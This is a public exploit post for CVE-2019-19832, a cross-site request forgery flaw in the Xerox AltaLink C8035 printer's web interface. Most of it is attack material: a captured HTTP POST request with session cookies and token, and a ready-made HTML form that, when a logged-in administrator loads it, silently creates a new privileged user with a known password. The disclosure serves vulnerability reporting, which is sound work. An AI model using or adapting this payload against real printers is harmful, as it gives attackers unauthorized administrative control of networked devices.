Share
# Exploit Title: Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.xerox.com/
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/altalink-c8000-series
# Software : Xerox Printer
# Product Version:  AltaLink C8035
# Vulernability Type : Cross-Site Request Forgery (Add Admin)
# Vulenrability : Cross-Site Request Forgery
# CVE : CVE-2019-19832

# Description :

The CSRF vulnerability was discovered in the AltaLink C8035 printer model of Xerox printer hardware.
A request to add users is made in the Device User Database form field. This request is captured by
the proxy. And a CSRF PoC HTML file is prepared. Xerox AltaLink C8035 printers allow CSRF. A request
to add users is made in the Device User Database form field to the xerox.set URI. 
(The frmUserName value must have a unique name.)


# HTTP POST Request :

POST /dummypost/xerox.set HTTP/1.1
Host: 158.162.130.37
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 707
Origin: https://158.162.130.37
Connection: close
Referer: https://158.162.130.37/properties/authentication/UserEdit.php?nav_point_key=10
Cookie: PHPSESSID=fd93756986787a2e338da8eae1ff2ef4; statusSelected=n1; statusNumNodes=8; CERT_INFO=8738a6169beda5f6cc754db4fc40ad63; propSelected=n59; propHierarchy=00000001000000000000000010010; LastPage=/properties/authentication/UserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp
Upgrade-Insecure-Requests: 1

NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3F&isRoles=True&isPassword=True&isCreate=True&rolesStr=6%2C1%2C2&limited=0&oid=0&minLength=1&maxLength=63&isFriendlyNameDisallowed=TRUE&isUserNameDisallowed=TRUE&isNumberRequired=&CSRFToken=34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a&currentPage=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10&_fun_function=HTTP_Set_User_Edit_fn&frmFriendlyName=Ismail+Tasdelen&frmUserName=ismailtasdelen&frmNewPassword=Test1234%21&frmRetypePassword=Test1234%21&frmOldPassword=undefined&SaveURL=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10

# CSRF PoC HTML :

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://158.162.130.37/dummypost/xerox.set" method="POST">
      <input type="hidden" name="NextPage" value="/properties/authentication/UserManager.php?" />
      <input type="hidden" name="isRoles" value="True" />
      <input type="hidden" name="isPassword" value="True" />
      <input type="hidden" name="isCreate" value="True" />
      <input type="hidden" name="rolesStr" value="6,1,2" />
      <input type="hidden" name="limited" value="0" />
      <input type="hidden" name="oid" value="0" />
      <input type="hidden" name="minLength" value="1" />
      <input type="hidden" name="maxLength" value="63" />
      <input type="hidden" name="isFriendlyNameDisallowed" value="TRUE" />
      <input type="hidden" name="isUserNameDisallowed" value="TRUE" />
      <input type="hidden" name="isNumberRequired" value="" />
      <input type="hidden" name="CSRFToken" value="34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a" />
      <input type="hidden" name="currentPage" value="/properties/authentication/UserEdit.php?nav_point_key=10" />
      <input type="hidden" name="_fun_function" value="HTTP_Set_User_Edit_fn" />
      <input type="hidden" name="frmFriendlyName" value="Ismail Tasdelen" />
      <input type="hidden" name="frmUserName" value="ismailtasdelen" />
      <input type="hidden" name="frmNewPassword" value="Test1234!" />
      <input type="hidden" name="frmRetypePassword" value="Test1234!" />
      <input type="hidden" name="frmOldPassword" value="undefined" />
      <input type="hidden" name="SaveURL" value="/properties/authentication/UserEdit.php?nav_point_key=10" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

#  0day.today [2019-12-17]  #